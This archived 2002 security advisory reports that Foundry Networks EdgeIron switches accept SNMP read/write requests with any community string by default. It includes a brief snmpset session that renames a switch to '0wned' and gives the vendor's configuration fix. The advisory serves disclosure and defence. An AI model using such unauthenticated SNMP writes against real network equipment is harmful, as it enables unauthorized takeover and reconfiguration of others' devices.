TUCoPS :: Network Appliances :: napl5200.htm

Foundry Networks EdgeIron SNMP opened R/W to **any** community name
21th Mar 2002 [SBWID-5200]

	Foundry Networks EdgeIron SNMP opened R/W to **any** community name


	Foundry Networks EdgeIron, current release as of 21 March 2002


	From advisory@prophecy.net.nz :

	Default SNMP configuration allows SNMP requests to the switch  with  any
	community string to have read and write access. All that is required  is
	IP access to the switch.




	[prophecy@loki ~]$ snmpget public system.sysName

	system.sysName.0 =

	[prophecy@loki ~]$

	[prophecy@loki ~]$ snmpset totallyinvalidcommunitystring

	system.sysName s \"0wned\"

	system.sysName.0 = 0wned

	[prophecy@loki ~]$


	I have tested this both before  and  AFTER  deleting  the  default  SNMP
	communities from the switch.  The  default  strings  are:  public  (RO),
	private (RW).


	It turns out that this is less a problem,  and  more  a  \'feature\'  of
	these  switches.  The  fix  from  Foundry  is  to  issue  the  following


	EdgeIron(config)#snmp-server security


	EdgeIron(config)#snmp-server user <name> <community-string> <ip-address>


	This then allows the specified IP  to  talk  to  the  switch  with  that
	community  string.  Requests  from  other  IP\'s  are  ignored  and  the
	\'snmp-server security\' option  basically  turns  on  the  checking  of
	SNMPv1 community strings.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH